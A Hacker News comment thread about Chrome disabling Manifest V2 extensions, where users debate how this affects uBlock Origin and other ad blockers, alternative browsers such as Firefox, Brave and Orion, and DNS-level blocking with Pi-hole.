> Forking WebKit, porting hundreds of APIs and writing a browser app from scratch has been challenging for our small team. Properly maintaining an open-source project takes time and resources we’re short on at the moment, so if you want to contribute at this time, please consider becoming active on orionfeedback.org.
I won’t be touching this binary with a ten foot pole until every line of code is open.
Many excellent alternatives already exist that are also open and free, I don’t see a compelling argument to use this software on any device at the moment.
Fair play, but by that logic you shouldn't touch Mac OS as well, so the whole thing is moot since Mac OS is the only OS that is supported by Orion.
Curious why exactly and what is wrong with closed source paid for products? By that token nobody should be touching Safari or iOS/macOS for that matter?
> By that token nobody should be touching Safari or iOS/macOS for that matter?
Ideally, yes.
> I won’t be touching this binary with a ten foot pole until every line of code is open.
You say this while using macOS? lmao
Isn't Webkit GPL? How is it not open source?
Just a general rule of thumb that has served me well: If it's GPL, Apple wouldn't be using it. Apple hates the GPL as it is the antithesis of their operating model.
https://webkit.org/licensing-webkit/
WebKit is part LGPL, and part BSD.
So I think from purely a licensing point of view, they are probably not in violation. Provided that the way they are linking the LGPL-licensed code is compatible with the LGPL.
But like the other commenter said, I too would not run any web browser that was not fully open source, like this Orion browser.
If they are forking Webkit, like they say, doesn't that require they distribute the source to their fork? Even if they don't have to distribute the browser linking to it?
Or do I not understand the obligations of LGPL?
I love Kagi, but I wish they focused on their core product first. Search is a hard problem to nail down and there's no shortage of bugs in Kagi right now, their issue tracker is a solid testament to that. When they spread their attention and resources between multiple products, they run the risk of pulling a Mozilla and shooting themselves in the foot multiple times.
They do focus on their core product first. I hang out in their discord, it's first priority always. Their other ventures are in service of the search engine— FastGPT powers quick answers, universal summarizer powers the "summarize this link" feature, small web is their go at an index of their own.
Orion is kind of a stretch I think, but they do see it as being in service of their search product as it's the only way they'll ever be the default search engine anywhere.
Interesting! So it’s basically like Safari but with actual good web extension support (safari’s answer to extensions is terrible)
Orion is amazing.
For people who want to stick with a Chrome-based browser while still using the full-featured uBlock Origin: Brave will keep supporting uBlock Origin even after Manifest V2's removal from Chromium.
https://brave.com/blog/brave-shields-manifest-v3/
Brave browser should probably not be trusted. They violated basic trust by redirecting URLs to their own affiliate links for those URLs. That is pretty bad. https://www.theverge.com/2020/6/8/21283769/brave-browser-aff...
For how long, though? And what will be the next marketing scam after crypto/tokens? Something with AI?
Note that Brave's creator opposes same sex marriage, is a Coronavirus "skeptic", and his silly cryptocurrency is made to work with brave browser.
Brave's creator, B. Eich, also created JavaScript, so I assume you have that disabled everywhere.
Yes, he created an absolutely terribly designed language that we're still dealing with today. That is not a good thing.
Oh I wish.
Nothing wrong with any of those positions. And largely irrelevant to whether he's good at his job and whether Brave is a good browser which it is for various reasons, one of which being he leads the company.
>opposes same sex marriage
That's not true, he donated to organizations supporting California Proposition 8 which banned same-sex marriage which by the way was supported by the majority back then in California. That was also 16 years ago, it's time to let it go and stop spreading misinformation. You should instead not rely on ad-hominem and critize Brave for being ridden with cryptocurrency and doing shady stuff.
Do you have any evidence his opinion has changed? If you don't, then it's not misinformation, and no you don't get to demand people "let it go" because it was 16 years ago.
And donating to a specific cause shows a lot more commitment and understanding than a typical vote.
I don't care.
Totally unrelated, firefox is an excellent browser
But not when you want to install GrapheneOS using the web-based installer, because Mozilla refuses to implement WebUSB
Sounds like a reasonable trade-off.
I imagine they couldn't figure out what an appropriate warning window would look like for that kind of protocol.
Chrome supports WebUSB. The bowser asks if you want to connect a device and presents a list of supported devices. It works amazingly well.
This submission title does not appear to be accurate. Here's what was actually said:
> October 9th 2024: an update on Manifest V2 phase-out.
> Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels.
> We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks. Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension. For a short time, users will still be able to turn their Manifest V2 extensions back on. Enterprises using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025. See our May 2024 blog for more context.
They said "we have started disabling Manifest V2 extensions on pre-stable channels", and the "Chrome canary" referenced in the submission title is a pre-stable channel. The submission title is accurate, but narrowly highlighting only one facet of Google's update statement.
That's old news, as noted in my other comment: https://news.ycombinator.com/item?id=41810420
The change here is actually about the stable channel.
Also, the title makes it sound like MV2 code has been removed from the source, but that's not the case.
> That's old news, as noted in my other comment:
None of your comments have actually provided evidence for this assertion, and the previous update dated June 3rd 2024 says users will start seeing a warning. So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
> None of your comments have actually provided evidence for this assertion
It's not an assertion. It's simple reading comprehension. How else can you interpret this?
"Over the last few months, we have continued with the Manifest V2 phase-out. Currently the chrome://extensions page displays a warning banner for all users of Manifest V2 extensions. Additionally, we have started disabling Manifest V2 extensions on pre-stable channels. [paragraph break] We will now [emphasis mine] begin disabling installed extensions still using Manifest V2 in Chrome stable."
> So when between June 3 and October 9 did Google start actually disabling MV2 extensions, and where was it publicized prior to their October 9 update?
I don't know if it was publicized, until now.
After all, when did they publicize that there would be a warning in Chrome stable? But there is a warning in Chrome stable. That started happening some time before this announcement.
Four months is a long gap between announcements.
> I don't know if it was publicized, until now.
So you literally don't know if it was news before now, but you're insisting on calling it "old news", apparently based solely on Google using past tense in their announcement.
> So you literally don't know if it was news before now, but you're insisting on calling it "old news"
That was just a figure of speech, which I don't wish to quibble over. I don't insist on using that phrase. The point, from the beginning, is that the HN submission title is not good.
It actually doesn't matter when exactly that Google began disabling MV2 extensions in Chrome canary, because what's the justification for focusing on canary in the submission title when the announcement says, "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable"?
[EDIT:] I see that the submission title has now indeed been changed, so this argument has become redundant.
But still it’s the first stab wound inflicted on CaesarMainline, he’s toast
The most relevant part is:
> Additionally, we have started disabling Manifest V2 extensions on pre-stable channels.
Title could have been a bit more broad (probably should say "pre-stable" instead of "canary"), but I would say it is inaccurate.
> The most relevant part is:
That's actually not the most relevant part. The most relevant part is "We will now begin disabling installed extensions still using Manifest V2 in Chrome stable. This change will be slowly rolled out over the following weeks."
Google had already started disabling Manifest V2 extensions on pre-stable channels, prior to October 9.
The first paragraph is "what we've been doing." The second paragraph is "what we'll do now."
Ok, I've replaced the title with that language from the article (shortened a bit to fit HN's 80 char title limit). Thanks!
Submitted title was "Manifest v2 is now removed from Chrome canary"
I'm addition to all the calls to switch to another browser I'd also have people consider the websites they use as potential dependencies on chrome.
Right now most websites don't seem to require any specific chrome feature but with Google's pushing some API's like their Web Environment Integrity proposal I'm worried sites will start to lock their site to Google Chrome and their official Mobile clients.
But what about Safari users? Such a lock-down could force Apple to drop the $20B search engine deal with Google.
Has anyone been using the v3 compatible version of uBlock Origin? Have you noticed much of a difference? From what I read there isn't supposed to be much of a difference?
Static list of uris versus live heuristics. So "much of a difference" depends a lot on what you browse. If your browsing is covered by the static list, yes...there's little difference.
Also, keep in mind advertisers are not unaware of all this movement. You don't think they'll try new tactics once they know everyone using chrome is now hobbled to solely static lists? That cloaking (or other approaches) won't then become really popular?
A lot of other ad blockers use static lists for years. The fact that they work tells that ad industry does not see the blockers as a problem that needs to be dealt with. It can also be that so far the increased cost of development of ads that are immune to simple static lists is not worth it.
I’ve noticed a huge number of websites have interstitials pop up asking you to remove your ad blocker. While some let you bypass it anyway some don’t. Clearly the websites themselves seem to care.
Right. Advertisers didn't bother with all these tactics because normal chrome users could download a plugin without any major hurdles to thwart it. Why drive people that wouldn't otherwise use an ad blocker to do so?
That's going away now. Now mostly everyone is vulnerable with the only recourse being pretty technical stuff, not just downloading a very popular plugin.
So advertisers will now be free to get more aggressive without much downside.
Edit: I do get that this sounds like conspiracy theory. But it really matches the Google boiling frogs approach. Removing the blocking onBeforeRequest, as one of the very first things in the manifest v3 spec was not a coincidence.
Even if Google did want to reduce effectiveness of ad blockers, doing that via removal of blocking webRequest API is a double-edged sword. It may push users to alternate browsers with more effective ad-blocking.
Besides, webRequest implementation in Chromium is a terrible collection of hacks on hacks. It is a good example how not to design or implement API. I will not be surprised if the removal of the API comes from a simple desire to remove that embarrassing code.
onBeforeRequest was removed because it is a massive spyware and malware vector.
> I do get that this sounds like conspiracy theory.
> … was not a coincidence.
Could it be that it was coincidence? Do you have a solution for reducing extension malware without removing onBeforeRequest?
> onBeforeRequest was removed because it is a massive spyware and malware vector.
Yet you can still inject js right into the page. You just can't stop a page that was going to load from loading. They could have taken away the onBeforeRequest redirect capability and left just the onBeforeRequest cancel capability.
Not sure I've heard of any spyware/malware depending on just that cancel capability.
That uses a different manifest permission.
https://developer.chrome.com/blog/crx-scripting-api#breaking...
That's remotely hosted code...also a problem, but you can inject code that's not remotely hosted.
The point is that it’s a different permission.
https://news.ycombinator.com/item?id=41812416
If you are really privacy conscientious, ad blocking extensions should be able to exist without any access to web requests now.
I feel like we're losing the plot here. Removing the cancel capability of onBeforeRequest didn't improve security much. It did, though, hobble ad blockers to just dealing with static lists if they want to prevent an ad from downloading in the first place.
Removing the onBeforeRequest redirect didn't add much security either, since you can just ask for permission B instead of permission A and just inject code. Though, ad blockers don't need that anyway.
It’s insane to think that an extension with the ability to snoop on all your requests is more privacy oriented than one that can’t.
It’s insane to want extensions to snoop on all your requests in an attempt at more privacy.
It only sounds insane because you're saying "want extensions to snoop" to describe "want extensions to run a function call locally".
It is a permission that could be used by a malicious extension to snoop, but that is far from the only use. Wanting the permission != wanting snooping.
Well, I would allow it for one specific extension that I feel does more good than harm for the capability. Call me insane.
I made a plugin for scraping using onBeforeRequest. It's very useful.
I have been using the Firefox version of it for more than a year by now, basically as soon as it came out. I commented on HN that I was going to do it: https://news.ycombinator.com/item?id=37219071
There's no difference whatsoever.
And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Of course this differs with the kind of sites you visit. So you need to try it on your own. I can believe that perhaps for some people this is a downgrade, but don't automatically assume uBlock Origin Lite won't work well for you.
Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago, finally matching the security and the privacy in that regard. The reduction in adblocking is so miniscule in aggregate - since declarative approach will always cover all the major advertisers - that it's not even a meaningful "trade-off".
> Anyone jumping up and down about MV3 while using Mac or iOS are hypocrites, since MV3 is essentially doing the same thing Safari did years ago,
iOS I'll give you, but macOS can in fact run ex. Firefox.
> finally matching the security and the privacy in that regard.
"Matching" inferior security+privacy is not a good thing. The only way this is an improvement if you think the blockers are malicious; otherwise a useful tool in the users interest has been made less powerful.
> The only way this is an improvement if you think the blockers are malicious
Extensions and in turn MV2 blockers can easily be malicious.
https://usa.kaspersky.com/blog/dangerous-chrome-extensions-8...
Look at how many in Kaspersky’s list are advertised as ad blockers. The majority of users aren’t tech savvy like HN.
> Look at how many in Kaspersky’s list are advertised as ad blockers
By my count 5, 6 if we include "Autoskip for Youtube", out of 34. That might be an argument for dropping extensions, but I don't think it's an argument for breaking ad blockers.
> That might be an argument for dropping extensions
Those extensions used the same API that ad blockers used, but for malicious purposes.
So, you would support removing that API? Well, that’s what they did for MV3 and implemented an API just for ad blocking.
> Those extensions used the same API that ad blockers used, but for malicious purposes.
Sounds like an obvious chance to flag the extension for further review, and probably a warning on the user side.
> So, you would support removing that API?
Of course not; that's throwing out the baby with the bath water. This brings us back to the "further review" thing; there's plenty of precedent for a platform having API surface that only a smaller subset of apps/extensions are allowed to use, because the features it exposes are legitimately needed for some things but it could be abused so it gets flagged and you have to write a detailed explanation for why your thing really needs this permission and then the reviewers can look at it particularly closely.
> Well, that’s what they did for MV3 and implemented an API just for ad blocking.
And then for bonus points they hobbled it so that it couldn't be used to make as good of ad blockers, which is why the whole thing is not okay.
One of the most common API malware extensions use is what MV3 blocks, and adblock extension is one of the common malware vectors:
https://helpcenter.getadblock.com/hc/en-us/articles/97384768...
https://www.wired.com/story/fake-chrome-extensions-malware/
This has been never ending.
Okay, if you absolutely must then make that specific API require extra audit approval from the extension store, but breaking it outright is throwing out the baby with the bathwater; in a world where the FBI outright recommends an adblocker because ads are such a strong malware vector ( https://techcrunch.com/2022/12/22/fbi-ad-blocker/ ), it's irresponsible to undermine uBo.
Nobody likes extra audit approvals. The platform doesn't want to spend resources doing the audit. The developers don't want to be audited.
The Firefox version of uBlock Origin Lite was pulled due to unsatisfactory audit process: https://news.ycombinator.com/item?id=41707418
> The Firefox version of uBlock Origin Lite was pulled due to unsatisfactory audit process
So make one that isn't incompetent? That's not really a counterargument to the general idea.
It’s similar, but not the same. Safari lets you dynamically generate rules that are then compiled for privacy and efficiency. The limits were increased to 150000 rules per content blocker due to user demands [1]. And each extension can have multiple content blockers.
MV3 has a measly 30000 static rule limit. These rules are included with the extension and cannot be updated dynamically. And a 5000 dynamic rules limit. [2]
EDIT: Chrome now has a 300000 shared pool for static rules for extensions that go over their 30000 limit. And a 30000 dynamic rule limit [3].
[1] https://adguard.com/en/blog/adguard-for-safari-1-11.html
[2] https://adguard.com/en/blog/adguard-mv3-beta.html
[3] https://developer.chrome.com/docs/extensions/develop/concept...
The limit is 330000 rules:
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000." https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
It looks like it’s a shared quota now with a minimum per extension [1].
Still sucks that the rules are static though. AdGuard devised a method to diff ruleset changes with the built in rules to generate dynamic rules between extension updates. So, I guess it works.
[1] https://developer.chrome.com/docs/extensions/develop/concept...
I see boatloads of ads in Safari on iOS. To the point that web browsing on my phone is intolerable, so I don't do it.
This is such a data-free anecdote. Which websites are showing ads? Which ad blocker did you install on iOS?
Which adblocker are you using? I have adguard and dont get ads on most safari sites but its just static DNS blocking so first party ad servers like youtube dont get blocked.
Why should I need an adblocker app from some third party to which I have to grant full control over my browser? Apple would be enormously popular if they included one by default. Perhaps as an option you could disable. I don't know why all browsers don't do this (well, I know why Chrome doesn't).
Browsers are selected by users, they should have no obligation to show ads.
Brave is the only one doing this right AFAIK.
Almost all the problems with tracking and buying and selling user profiles would end if browsers just didn't show ads.
> There's no difference whatsoever.
That's simply not true. Have you ever donde a side by side comparison, or are you just going by feeling?
> And it's not surprising because on my iOS device I've been using similarly architected content blockers since 2015. There's no issue with declarative ad blocking.
Really?
Because I find adblockers on iOS are nowhere near as good - they let far more ads through, and they leave far more sites broken so I have to disable the ad blocker for the site to work.
That is the fault of the blockers themselves. The one I use (https://apps.apple.com/us/app/1blocker-ad-blocker/id13655310...) works extremely well and even uses a local VPN setup for app ad-filtering.
Twitter and YouTube ads are blocked.
The drawback? It isn’t free.
I’ve been using AdGuard. There are some limitations with MV3, but it’s not noticeable [1]. AdGuard uses dynamic rules for updating rules between extension updates and for custom user rules. There’s the option using their system level AdBlocker too.
[1] https://adguard.com/en/blog/adguard-browser-extension-mv3-re...
Another happy user of uBlock Origin Lite on Chrome here. No difference. 1Blocker on Safari user since Apple came out with the declarative adblocking system there as well.
I've been using Lite for the past few months, I've seen no real difference. I think if you're particular about rulesets or are heavily customizing uBlock you may want to consider switching browsers, but I'm happy enough that I'm remaining on Chrome.
I used the lite version while on chromium for some time. I noticed no difference in terms of blocking ads.
The main thing I missed was the ability to block arbitrary elements with the zapper. I use this for more than just ads, so losing it is a real loss in functionality. Otherwise it worked fine.
Yeah the zapper is indispensable. Being able to filter content on platforms by the words in post titles is one of the best ways to not be exposed to toxic content.
Never leaving your subscriptions (never using the algorithm recommended feed) is not a solution because of second-hand toxicity, e.g. political posts in meme subreddits in an election year.
If anyone knows of a solution that works in Manifest V3 I'd love to hear it!
Found something, a drop-in replacement.
AdGuard AdBlocker (MV3 Beta): https://chromewebstore.google.com/detail/adguard-adblocker-m...
Copy and pasting the ublock custom filters into AdGuard seems to work.
I use Adblock Plus, and ad blocking still perfectly works. Not sure about uBlock origin though.
I for one am just going to wait it out and see what the internet looks like nowadays without an adblocker, if it doesn't auto-update. It's been so long.
Goodbye Chrome, hello firefox
Adblockers are my least concern, a lot of other useful add-ons won't work, like Imagus, Redirector, Violentmonkey, etc. So I switched to Firefox a few months ago.
Does Mozilla have a PR blitz, to pick up a big chunk of users who have a moment of disruption, and want their full uBlock Origin?
It might've been better, had uBlock Origin Lite not happened, but is there still a migration opportunity here, and is Mozilla working it?
They seem to have the opposite going on, they often manage to fumble what little opportunity you'd think they have. Was just thinking of the ubo lite example you mentioned:
https://news.ycombinator.com/item?id=41707418
And also recently, their poor engagement/comms around Privacy-Preserving Attribution:
https://blog.mozilla.org/en/mozilla/improving-online-adverti...
I will recommend Librewolf. Default Firefox has a lot of garbage and bloat.
I was looking for an excuse to switch back to Firefox anyways.
Can you guys just all go to Firefox so it has a chance, the way Chrome changes things is not acceptable and Firefox, performance wise, is just as fast even if people say otherwise. Try it and test for yourself.
I am tied to Microsoft Edge for sync between desktop and phone, and Microsoft Edge on iOS has AdBlock built in. But looking at this it seems inevitable that Edge will retain V2.
As to switching to Firefox? I'd love to, but Firefox on iOS refuses to put in an AdBlocker. Yea, you can use Firefox Focus but that one doesn't sync.
I don't understand Mozilla's stance on this.
AFAIK, Microsoft is disabling manifest V2 extensions in Edge following the same timeline as Chrome[1]. Brave is continuing to run V2 extensions, but has no plan to stand up their own extension store[2], so it isn't clear how users will get the extensions, beyond a few handpicked ones that Brave is supporting[3].
[1] https://learn.microsoft.com/en-us/microsoft-edge/extensions-...
[2] https://github.com/brave/brave-browser/issues/15187
[3] https://github.com/brave/brave-browser/issues/28367
Firefox doesn't exist on iOS, it's just reskinned safari. It's not Mozillas fault that Apple won't let you install a different web engine.
Edge on iOS, which is also reskinned Safari, has AdBlock Plus integrated.
So it IS possible.
Safari allows some ad blocking but nothing close to ublock.
Take a look at Vivaldi, as well - it covers all major desktop and mobile platforms now and syncs across all of them through their own servers, and it also has integrated adblock.
It is really crazy that we are taken hostage/blackmail by whatever harmful decision Google takes in their own interest.
Chromium is open source, you're free to use it.
This is irrelevant because the changes are occurring upstream in Chromium by mostly Google developers.
Open source also means you're free to fork it or freeze your version
Forking is untenable for individual humans with something so complicated, and freezing is dangerously insecure.
Should we start a HN browser then?
I think at this point I'd rather pay for a desktop browser, something with blocking baked in at compile time. It would be such a QoL improvement that it's worth paying a yearly subscription for.
I’m already paying for kagi search.
https://www.mozilla.org/en-US/firefox/new/
Chrome to Firefox is a relatively easy switch, especially for those that don’t depend on Google sync. The main sources of friction for me were the lack of a good profile switching UI (solved with a browser extension that mimics the Chrome menu), and weird security requirements for homemade extensions (IIRC if you want to have the extension persist after restarting Firefox, you need to sign the extension, which is a pain)
For users switching from Arc, there is no good alternative, but Firefox with Sidebery and custom CSS comes close.
I don't know if this is what you meant, but as an alternative to profile switching, there are Multi Account Containers [1]. It allows assigning a container to each tab, and the containers are isolated from each other. If you have an MS or Google account for both work and personal, you can open them at the same time in different tabs.
[1] https://addons.mozilla.org/en-US/firefox/addon/multi-account...
I'm using using multiple profiles when I want to have a different set of extensions, bookmarks and browsing history. Multi Account Containers help with none of that.
This same conversation plays out every time someone mentions profile switching that is responded with "container tabs".
this is such a killer feature I don't understand why it even is an extension, every browser that isn't adversarial to the user should have that feature tbh
I've found it hard to teach people how to use but it is a killer feature.
> For users switching from Arc, there is no good alternative, but Firefox with Sidebery and custom CSS comes close.
I would suggest zen browser [1] for those people.
[1] https://zen-browser.app
I'd like to pop in and say Waterfox also has a list of comparable features: https://www.reddit.com/r/waterfox/comments/1ff0kzz/comment/l...
Note that Firefox profile management is getting an overhaul right now, including an easy profile switching UI. I'm not sure when it will be landing in release, but it is being actively built!
Which bugzilla # is it. I can only find decades old requests for such a feature that are closed as WONTFIX.
This is insanely overdue.
I've tried to switch from Vivaldi to Floorp and there is some things that Firefox does that drive me absolutely nuts.
The main one is the behaviour of pinned tabs. Pinning in Firefox turns it into an icon that is harder to hit and doesn't even protect it from closing. This makes them essentially useless, they should be moved to the front of the tab bar and be protected from closing.
The second is that when you use vertical tabs the tab bar acts like a title bar instead of a separate entity. This means you can't double click to create a new tab, and trying to drag a tab often results in the entire window moving. I have to use Tree style tabs and disable the normal tab bar completely to prevent this.
There are also things that I don't like such as how downloads are handled and I've has issues with my session tabs being saved properly.
> they should be moved to the front of the tab bar and be protected from closing.
Firefox pinned tabs are moved to the LHS of the tab bar, they have no close button and ctrl-W doesn't close them. How much more do you want them to be protected from closing?
This is actually one thing where Firefox is clearly better than Chrome ... Chrome pinned tabs close with ctrl-W which is really easy to do accidentally.
Middle click still closes tabs which is my most frequent way to close tabs.
As I mentioned Vivaldi is my Chromium based browser of choice, and it is far better in the handling of pinned tabs. They go up to a separate section at the start of the tab list without reducing in size, and then they absolutely cannot be closed without unpinning the tab first
Profile is already available in Firefox(before chrome implemented it). Details on how to use it: https://support.mozilla.org/en-US/kb/profile-manager-create-...
Also in chrome, multiple profiles need multiple google account(If I understand the UI correctly)connected, but in Firefox no account is needed.
> Also in chrome, multiple profiles need multiple google account(If I understand the UI correctly)connected, but in Firefox no account is needed.
You can use Chrome with multiple profiles by disabling the "Allow Chrome sign-in" option so that none of your browser profiles are tied to a Google account. I don't know if that option can be toggled on a per-profile basis, because I happen to prefer it off for all of my browser profiles.
Arc has a built-in adblocker, so it depends if you're tied specifically to uBlock Origin (non-lite) features.
I'm not sure what other extensions would be broken in Manifest v3.
One feature that is missing, removed, from Firefox is PWA's/running sites as apps. This is super handy for low trust apps
same here, the one thing keeping me on chrome
I don't know much about Arc. But Arc users could give Firefox "Nightly" a try to preview new features coming up. It has vertical tabs and you can "pin" a few tabs at the top. Nightly also has containers already built-in, so you can have multiple accounts open for the same site in different container tabs.
In the past I've had a lot of issues with Google properties not working properly on Firefox -- either outright broken or using crazy amounts of CPU on Firefox but not Chromium-based browsers. Does anyone know if this is still an issue? I'd love to try again before I'm forced to by uBO breaking.
Firefox containers are amazing
I've been using Floorp for a while to get proper vertical tabs.
I love Mozilla, but I’m concerned about its future. Since 80% of its income reportedly comes from the Google search deal, do they have a plan to replace it after the recent ruling? And can they maintain their current level of autonomy while doing so?
The Android version of Firefox still doesn't have working keyboard shortcuts after 13 years or a way to delete individual history items to prevent broken auto complete. The money is going into lots of other things than the browser.
I'm not sure keyboard shortcuts for a version designed to run on an OS for devices without keyboards will ever be a priority. You can use a keyboard on an Android device, but the vast, vast majority of Android devices are phones that never get used with keyboards. I don't expect there's much priority to adding that feature.
I agree that a lot of money is going to things other than the browser though.
Many people use tablets and foldables with keyboards
Killing adblocking in Chrome might be a boost they need to attract someone else to pay for being the landing search page. I doubt if anyone will pay as much as google though. Or probably even close.
uBlock Origin + Multi Account Containers makes Firefox enjoyable to use.
Main reason I'm still using Chrome and can't switch to Firefox: https://connect.mozilla.org/t5/ideas/feature-suggestion-fire...
There is something wrong with your Firefox installation (maybe try a new profile with vanilla settings). I use search shortcuts all the time (w + spacebar for wikipedia) and it's exactly the same behavior in Firefox than Chrome/Edge.
hm i'll post this in the thread over there later but i'm pretty sure ff has that?
https://imgur.com/a/gXrsBq3
Anyone using a PiHole to block on their network? I've been aware of it, but honestly, ad blocking was good enough that I didn't go down that route. Is PiHole good enough? Is there a big problem with false positives?
Yep, and it's great. Beyond ads, you can also configure it to block malware. Got a phishing email from scammer.ru? Nothing happens even if you to click the link in it because that name won't resolve. There were a very short list of exceptions, maybe 2 or 3, I had to add to ours over the years, mainly for hostnames like tracking.shippingcompany.com that got added by mistake.
Note that it does nothing to block DNS over HTTPS lookups. If your browser insists on going around your LAN's DNS setup, Pi-hole can't help you.
It can't handle YouTube ads unfortunately.
I love my PiHole. I block more stuff than just ads with it. No problems with false positives in default setups. I went a bit nuts adding blocklists, personally (it's not necessary lmao; be judicious with what blocklists you add!) so sometimes run into something, but whitelisting things is really simple and I can't remember the last time I had to do it. My not-very-technical husband learned very quickly how to look in the query log to check if the PiHole is blocking something. He hasn't had to in ages. Temporarily disabling blocking is also super easy (simple, quick, effective escape hatch), and so is managing the various lists, so if my husband whitelists something from the query log and I want to refine it for some reason, I can without working hard. The configurability of blocking per configured group or client is amazing (and simple) as well; the video game consoles have separate rule sets than everything else which works super well for me.
Once again, I went stupid adding blocklists so the level of management previously required is kinda worst case-y and it is absolutely my own doing and since working through my idiocy it just works its magic without needing intervention. If you're more careful about not adding blocklists which say 'this will break things' (not hard) you'll be fine.
Id argue pihole is roughly equivalent to what you can do with manifest v3 based afld blockers. I use it as my primary ad blocker as well, and don't really understand why folks are upset about losing V2 that much. It seems like removing root in favor of more granular permissions which is generally a good thing.
I agree that more granular permissions is better (in terms of dictating which sites an extension has access to) but I think the main problem as I understand it is that this is an entirely seperate issue from the one that nukes uBO.
V3 introduces a hard limit on the total number network filters an extension is allowed to set and it's a laughably low number. Far below what uBO uses even on a barebones, default setup
There was already a specific permission for messing with raw network requests.
v3 removes the ability to block, but not the ability to monitor. It doesn't make anything more granular.
I'm using nextdns - happy with it.
> Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension.
I'm curious about which extensions will be recommended to replace uBlock Origin after it's disabled. I'm sure those alternatives will see a surge in installs.
Also, why doesn't the creator of uBlock Origin update the V2 version to the V3 version? I know V3 version isn't as good as V2, but if you're developing that product, at least give your users something instead of leaving them with nothing. Otherwise, they may end up choosing poor alternatives.
Everything you said has already been done: https://chromewebstore.google.com/detail/ublock-origin-lite/...
This V3 version will be pushed as a regular update on the current V2 version before is disabled? I think that must be done now to avoid even the alerts on users.
And people ask me why I don't run current versions of browsers.
If anyone has any guides or blogs related to migrating away from Chrome for a multi-decade user (thousands of bookmarks, saved pages/read later, etc.) I would sure be interested.
Every time I try to migrate my very large bookmark collection to another browser, it either misbehaves and partially loses some data or fails completely.
>Every time I try to
It would be good to know what not-chromes you have tried, so as not to suggest 'x', which may have not worked for you.
Time to try Supermium again, I couldn't get it to install using my Chrome profile last time, maybe fixed by now.
Unless Supermium is following the manifest path too? Doubt it.
https://en.wikipedia.org/wiki/Supermium
When the hell will firefox have a decent profile manager?? It's the one thing that is preventing me from switching over. No, container tabs are NOT it.
It's not a feature I use, but if you launch with "firefox --ProfileManager" it pops up a profile selection window. Maybe that's in the ballpark of what you want? https://support.mozilla.org/en-US/kb/profile-manager-create-...
The switching UI/UX is atrocious.
Darn, ublock also no longer works on Firefox for YouTube. At the beginning of each video there is one forced ad and sometimes the video stops for no reason.
I suppose they want everyone to stop using the Internet and read books.
I run uBO on FF, and I've yet to see any forced ads or video stops.
I'm on FF 131.0.2 with uBO 1.60.0.
Are you on premium. YouTube seemingly doesn't care about my adblocker because I am on premium.
Works for me. I have Youtube on constantly when at my desk as background noise and uBo is still blocking everything perfectly fine.
Edit: Seems Google/Youtube are experimenting/testing with injecting ads directly into the video streams:
https://old.reddit.com/r/uBlockOrigin/comments/1de9kv5/youtu...
The Brave Browser still blocks YouTube ads.
You probably need to update your filter lists. There is a megathread on Reddit for this issue, because it can have a lot of other causes also.
https://old.reddit.com/r/uBlockOrigin/comments/1etvawp/youtu...
Disable all other extensions and update your lists. It will work then.
Manifest V3 is not the problem itself. But removing webRequestBlocking and creating some ridiculous limits for the DNR api are, these changes should be reversed downstream.
I'm years ahead of them. I disabled Chrome years ago.
What does this mean for browsers derived from chrome, like Arc? I heard they plan on continuing to support Manifest v2, but will ublock continue to be maintained for chrome?
https://resources.arc.net/hc/en-us/articles/25540117353623-W...
MV2 code should remain well into 2025 since enterprises can still enable MV2 extensions. After that they may have to hard fork, which could become increasingly costly. Though they could coordinate to minimize duplicated efforts.
Why is this thread not on the first 4 or 5 pages of HN?
Down weighted? Happens when mods see too many comments and not enough upvotes.
Ah
I'm curious what V3 doesn't allow that V2 does.
I read an article about Ublock Origin light. It claimed it couldn't do script injection and content blocking but I've written V3 extensions that do that though maybe what I'm thinking and what ublock origin does are different things. Does anyone know specific details or maybe a pointer to docs on what's not possible?
URL requests should go to a OS level, where the user can intercept them at will. We do not need to give browsers the socket API.
can i just setup dns blocking on my network to block the ad requests? especially on youtube, ublock origin stopped working a few weeks ago.
So yes... but the issue with DNS blocking is in the exceptions.
First, exceptions are at the domain level. So you can't say "allow this domain on this site", you have to blanket-allow a domain or not.
Second, the UX for making exceptions isn't great. With uBO it's just a couple of clicks. With something like Pi-hole it's more complex: https://discourse.pi-hole.net/t/how-do-i-whitelist-or-blackl...
Not enough, especially since your browser may weasel out of it by using its own DNS via DoH.
Are you aware of any that do this? I've been using pihole for years and have no complaints. I've only seen smart TVs seem to do this, although it's usually configurable.
One example that I was remembering was Chromecast. It needed Google DNS to work at all.
In general, though if an app sticks to "known good" DNS over HTTPS and pins its certificate to boot, it will bypass DNS-based adblocking very easily, and additionally will punish you by not working at all if you try to do any firewall/routing trickery.
There's gonna be a new browser wars.
How exciting!
Time to do your part. Switch to ladybird!
(Insert imaginary we want you for the army poster here)
I realize I'm about to post something that sounds like the most generic HN slop comments... but, considering it's why Mozilla initially made a whole new language in the first place, I hope most can look past what fanatics would normally say and focus on the scenario:
I was ecstatic about Ladybird from a "fun NIH project" perspective but once it became "serious" and had a cross-platform daily-driver long term focus it was quite the let down that the hot new independent kickstart was... still going to be built on C++ anyways. Even the Serenity ecosystem had started work on a NIH memory safe language - Jakt! I'm not going to say the "R" word (mostly because I'm less interested "which" and more interested in the "what") but the one place I'd really like to see memory safety is the new fresh-engined web browser written by a small team (or really, any team).
On that front https://servo.org/ is "alive" again under the Linux Foundation. It has a focus on being an easily embeddable engine and it seems to be picking up a bit of steam. Whether or not it really takes off remains to be seen. I'll be watching closely though!
I agree with you there, on all parts.
My reason for learning Rust in the first place was trying to contribute to the servo engine. But then, Mozilla happened. My hope for servo continues, but it won't go anywhere if it stays in the limbo it has been in after Mozilla ditched it as a project. We need a real browser project, with a full UI/UX and everything, until people take it serious as a base to fork off.
